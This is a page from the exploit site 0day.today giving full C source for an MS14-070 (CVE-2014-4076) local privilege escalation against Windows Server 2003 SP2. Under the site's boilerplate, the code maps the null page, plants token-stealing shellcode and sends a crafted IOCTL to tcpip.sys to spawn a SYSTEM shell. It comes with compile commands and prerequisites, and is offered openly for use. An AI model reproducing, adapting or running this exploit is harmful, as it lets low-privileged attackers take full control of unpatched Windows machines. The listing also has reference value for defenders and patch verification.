0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
/* ################################################################ # Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070) # Date: 2015-08-10 # Exploit Author: Tomislav Paskalev # Vulnerable Software: # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows 2003 SP2 x86 # Tested on: # Windows 2003 SP2 x86 EN # CVE ID: 2014-4076 # OSVDB-ID: 114532 ################################################################ # Vulnerability description: # Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to # properly handle objects in memory during IOCTL processing. # By crafting an input buffer that will be passed to the TCP # device through the DeviceIoControlFile() function, it is # possible to trigger a vulnerability that would allow an # attacker to elevate privileges. # An attacker who successfully exploited this vulnerability # could run arbitrary code in kernel mode (i.e. with SYSTEM # privileges). ################################################################ # Exploit notes: # Privileged shell execution: # - the SYSTEM shell will spawn within the existing shell # (i.e. exploit usable via a remote shell) # - upon exiting the SYSTEM shell, the parent process # will become unresponsive/hang # Exploit compiling: # - # i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe # Exploit prerequisites: # - low privilege access to the target (remote shell or RDP) # - target not patched (KB2989935 not installed) ################################################################ # Patch: # https://www.microsoft.com/en-us/download/details.aspx?id=44646 ################################################################ # Thanks to: # KoreLogic (Python PoC) # ChiChou (C++ PoC) ################################################################ # References: # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076 # https://technet.microsoft.com/library/security/ms14-070 # https://www.exploit-db.com/exploits/35936/ # https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp # https://www.osronline.com/article.cfm?article=229 ################################################################ */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemPerformanceInformation = 2, SystemTimeOfDayInformation = 3, SystemProcessInformation = 5, SystemProcessorPerformanceInformation = 8, SystemInterruptInformation = 23, SystemExceptionInformation = 33, SystemRegistryQuotaInformation = 37, SystemLookasideInformation = 45 } SYSTEM_INFORMATION_CLASS; typedef DWORD NTSTATUS; NTSTATUS WINAPI NtQuerySystemInformation ( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG); NTSTATUS (WINAPI *ZwAllocateVirtualMemory) ( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ); NTSTATUS (WINAPI *ZwDeviceIoControlFile) ( HANDLE FileHandle, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG IoControlCode, PVOID InputBuffer, ULONG InputBufferLength, PVOID OutputBuffer, ULONG OutputBufferLength ); BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation) { ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO)); startupInformation->cb = sizeof (STARTUPINFO); ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION)); // Start the child process. return CreateProcess ( NULL, // No module name (use command line) "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32", // Start cmd.exe NULL, // Process handle not inheritable NULL, // Thread handle not inheritable TRUE, // Set handle inheritance to TRUE 0, // No creation flags NULL, // Use parent's environment block NULL, // Use parent's starting directory &startupInformation[0], // Pointer to STARTUPINFO structure &processInformation[0] // Pointer to PROCESS_INFORMATION structure ); } unsigned long SwapBytes (unsigned long inputByteUL) { return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) + ((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24)); } BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode) { int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5; returnAllocMemValue1 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x28, "\x87\xff\xff\x38", 4, NULL ); returnAllocMemValue2 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x38, "\x00\x00", 2, NULL ); returnAllocMemValue3 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x1100, &exploitBuffer[0], 32, NULL ); returnAllocMemValue4 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x2b, "\x00\x00", 2, NULL ); returnAllocMemValue5 = WriteProcessMemory ( (HANDLE) 0xFFFFFFFF, (LPVOID) 0x2000, &shellcode[0], 96, NULL ); if (returnAllocMemValue1 == 0 || returnAllocMemValue2 == 0 || returnAllocMemValue3 == 0 || returnAllocMemValue4 == 0 || returnAllocMemValue5 == 0) return FALSE; else return TRUE; } int main (void) { fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n"); fprintf (stderr, " [*] by Tomislav Paskalev\n"); fflush (stderr); //////////////////////////////// // CREATE NEW CME.EXE PROCESS //////////////////////////////// STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO)); PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION)); if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0])) { fprintf (stderr, "[-] Creating a new process failed\n"); fprintf (stderr, " [*] Error code : %d\n", GetLastError()); fflush (stderr); ExitProcess (1); } fprintf (stderr, "[+] Created a new cmd.exe process\n"); fflush (stderr); //////////////////////////////// // CONVERT PID TO HEX LE //////////////////////////////// unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [dec] : %#8lu\n", (unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [hex] : %#010x\n", (unsigned long) processInformation->dwProcessId); fprintf (stderr, " [*] PID [hex LE] : %#010x\n", pidLittleEndian); /*four bytes of hex = 8 characters, plus NULL terminator*/ unsigned char pidLittleEndianString[9]; sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian); //////////////////////////////// // CREATE SHELLCODE //////////////////////////////// unsigned char exploitBuffer[] = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00" "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"; unsigned char shellcode[] = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00" "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00" "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41" "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94" "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11" "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"; int counter; for (counter = 0; counter < 4; counter++) { char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0}; shellcode[46 + counter] = strtol (buffer, NULL, 16); } shellcode[77] = strtol ("39", NULL, 16); shellcode[78] = strtol ("ff", NULL, 16); shellcode[79] = strtol ("a2", NULL, 16); shellcode[80] = strtol ("ba", NULL, 16); shellcode[82] = strtol ("0", NULL, 16); shellcode[83] = strtol ("0", NULL, 16); shellcode[84] = strtol ("0", NULL, 16); shellcode[85] = strtol ("0", NULL, 16); fprintf (stderr, "[+] Modified shellcode\n"); fflush (stderr); //////////////////////////////// // CREATE HANDLE ON TCPIP.SYS //////////////////////////////// HANDLE tcpIPDeviceHandle = CreateFileA ( "\\\\.\\Tcp", 0, 0, NULL, OPEN_EXISTING, 0, NULL ); if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE) { printf ("[-] Opening TCP/IP I/O dev failed\n"); printf (" [*] Error code : %d\n", GetLastError()); ExitProcess (1); } fprintf (stderr, "[+] Opened TCP/IP I/O device\n"); fflush (stderr); //////////////////////////////// // ALLOCATE MEMORY - FIRST PAGE //////////////////////////////// FARPROC ZwAllocateVirtualMemory; ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory"); fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory); fflush (stderr); NTSTATUS AllocMemReturnCode; ULONG BaseAddress = 0x1000, RegionSize = 0x4000; AllocMemReturnCode = ZwAllocateVirtualMemory ( (HANDLE) 0xFFFFFFFF, &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (AllocMemReturnCode != 0) { printf ("[-] Allocating memory failed\n"); printf (" [*] Error code : %#X\n", AllocMemReturnCode); ExitProcess (1); } fprintf (stderr, "[+] Allocated memory\n"); fprintf (stderr, " [*] BaseAddress : 0x%p\n", BaseAddress); fprintf (stderr, " [*] RegionSize : %#010x\n", RegionSize); fflush (stderr); //////////////////////////////// // WRITE EXPLOIT TO PROCESS MEM //////////////////////////////// fprintf (stderr, "[*] Writing exploit...\n"); fflush (stderr); if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0])) { fprintf (stderr, " [-] Failed to write to memory\n"); fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); fflush (stderr); ExitProcess (1); } else { fprintf (stderr, " [+] done\n"); fflush (stderr); } //////////////////////////////// // SEND EXPLOIT TO TCPIP.SYS //////////////////////////////// fprintf (stderr, "[*] Spawning SYSTEM shell...\n"); fprintf (stderr, " [*] Parent proc hangs on exit\n"); fflush (stderr); FARPROC ZwDeviceIoControlFile; NTSTATUS DevIoCtrlReturnCode; ULONG ioStatus = 8; ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile"); DevIoCtrlReturnCode = ZwDeviceIoControlFile ( tcpIPDeviceHandle, NULL, NULL, NULL, (PIO_STATUS_BLOCK) &ioStatus, 0x00120028, //Device: NETWORK (0x12) //Function: 0xa //Access: FILE_ANY_ACCESS //Method: METHOD_BUFFERED (PVOID) 0x1100, //NULL, //Test 32, //0, //Test NULL, 0 ); if (DevIoCtrlReturnCode != 0) { fprintf (stderr, " [-] Exploit failed (->TCP/IP)\n"); fprintf (stderr, " [*] Err code : %d\n", GetLastError ()); fflush (stderr); ExitProcess (1); } //////////////////////////////// // WAIT FOR CHILD PROCESS; EXIT //////////////////////////////// // Wait until child process exits. WaitForSingleObject (processInformation->hProcess, INFINITE); fprintf (stderr, "[*] Exiting SYSTEM shell...\n"); fflush (stderr); // Close process and thread handles. CloseHandle (tcpIPDeviceHandle); CloseHandle (processInformation->hProcess); CloseHandle (processInformation->hThread); return 1; } # 0day.today [2024-12-25] #